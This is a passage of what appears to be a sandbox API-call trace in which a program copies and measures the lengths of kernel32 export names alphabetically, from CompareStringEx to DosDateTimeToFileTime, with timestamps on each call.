(lpString="COMPARESTRINGEX") returned 15 [0180.950] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0180.950] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0180.950] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0180.950] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0180.950] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0180.950] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0180.950] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0180.950] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0180.950] lstrcpyA (in: lpString1=0x36fce30, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0180.950] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0180.950] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0180.950] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0180.950] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0180.950] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0180.950] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0180.950] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0180.950] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0180.950] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0180.950] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0180.950] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0180.950] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0180.950] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0180.950] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0180.950] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0180.950] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0180.950] lstrlenA (lpString="COPYCONTEXT") returned 11 [0180.951] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0180.951] lstrlenA (lpString="COPYFILEA") returned 9 [0180.951] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0180.951] lstrlenA (lpString="COPYFILEEXA") returned 11 [0180.951] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0180.951] lstrlenA (lpString="COPYFILEEXW") returned 11 [0180.951] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0180.951] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0180.951] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0180.951] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0180.951] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0180.951] lstrlenA (lpString="COPYFILEW") returned 9 [0180.951] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0180.951] lstrlenA (lpString="COPYLZFILE") returned 10 [0180.951] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0180.951] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0180.951] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0180.951] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0180.951] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0180.951] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0180.951] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0180.951] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0180.951] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0180.951] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0180.951] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0180.951] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0180.951] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0180.951] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0180.951] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0180.951] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0180.951] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0180.951] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0180.951] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0180.951] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0180.951] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0180.951] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0180.951] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0180.951] lstrlenA (lpString="CREATEEVENTA") returned 12 [0180.952] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0180.952] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0180.952] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0180.952] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0180.952] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0180.952] lstrlenA (lpString="CREATEEVENTW") returned 12 [0180.952] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0180.952] lstrlenA (lpString="CREATEFIBER") returned 11 [0180.952] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0180.952] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0180.952] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0180.952] lstrlenA (lpString="CREATEFILEA") returned 11 [0180.952] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0180.952] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0180.952] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0180.952] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0180.952] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0180.952] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0180.952] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0180.952] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0180.952] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0180.952] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0180.952] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0180.952] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0180.952] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0180.952] lstrlenA (lpString="CREATEFILEW") returned 11 [0180.952] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0180.952] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0180.952] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0180.952] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0180.952] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0180.952] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0180.952] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0180.952] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0180.952] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0180.952] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0180.952] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0180.952] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0180.952] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0180.953] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0180.953] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0180.953] lstrlenA (lpString="CREATEJOBSET") returned 12 [0180.953] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0180.953] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0180.953] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0180.953] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0180.953] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0180.953] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0180.953] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0180.953] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0180.953] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0180.953] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0180.953] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0180.953] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0180.953] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0180.953] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0180.953] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0180.954] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0180.954] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0180.954] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0180.954] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0180.954] lstrlenA (lpString="CREATEPIPE") returned 10 [0180.954] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0180.954] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0180.954] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0180.954] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0180.954] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0180.954] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0180.954] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0180.954] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0180.954] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0180.954] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0180.954] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0180.954] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0180.954] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0180.954] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0180.954] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0180.954] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0180.954] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0180.954] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0180.954] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0180.954] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0180.954] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0180.954] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0180.954] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0180.954] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0180.954] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0180.954] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0180.954] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0180.954] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0180.954] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0180.954] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0180.954] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0180.954] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0180.955] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0180.955] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0180.955] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0180.955] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0180.955] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0180.955] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0180.955] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0180.955] lstrlenA (lpString="CREATETHREAD") returned 12 [0180.955] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0180.955] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0180.955] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0180.955] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0180.955] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0180.955] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0180.955] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0180.955] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0180.955] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0180.955] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0180.955] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0180.955] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0180.955] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0180.955] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0180.955] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0180.955] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0180.955] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0180.955] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0180.955] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0180.955] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0180.955] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0180.955] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0180.955] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0180.955] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0180.955] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0180.955] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0180.955] lstrcpyA (in: lpString1=0x36fce30, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0180.955] lstrlenA (lpString="CTRLROUTINE") returned 11 [0180.955] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0180.955] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0180.955] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0180.956] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0180.956] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0180.956] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0180.956] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0180.956] lstrlenA (lpString="DEBUGBREAK") returned 10 [0180.956] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0180.956] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0180.956] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0180.956] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0180.956] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0180.956] lstrlenA (lpString="DECODEPOINTER") returned 13 [0180.956] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0180.956] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0180.956] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0180.956] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0180.956] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0180.956] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0180.956] lstrcpyA (in: lpString1=0x36fce30, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0180.956] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0180.956] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0180.956] lstrlenA (lpString="DELETEATOM") returned 10 [0180.956] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0180.956] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0180.956] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0180.956] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0180.956] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0180.956] lstrlenA (lpString="DELETEFIBER") returned 11 [0180.956] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0180.956] lstrlenA (lpString="DELETEFILEA") returned 11 [0180.956] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0180.956] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0180.956] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0180.956] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0180.956] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0180.956] lstrlenA (lpString="DELETEFILEW") returned 11 [0180.956] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0180.956] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0180.956] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0180.957] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0180.957] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0180.957] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0180.957] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0180.957] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0180.957] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0180.957] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0180.957] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0180.957] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0180.957] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0180.957] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0180.957] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0180.957] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0180.957] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0180.957] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0180.957] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0180.957] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0180.957] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0180.957] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0180.957] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0180.957] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0180.957] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0180.957] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0180.957] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0180.957] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0180.957] lstrcpyA (in: lpString1=0x36fce30, 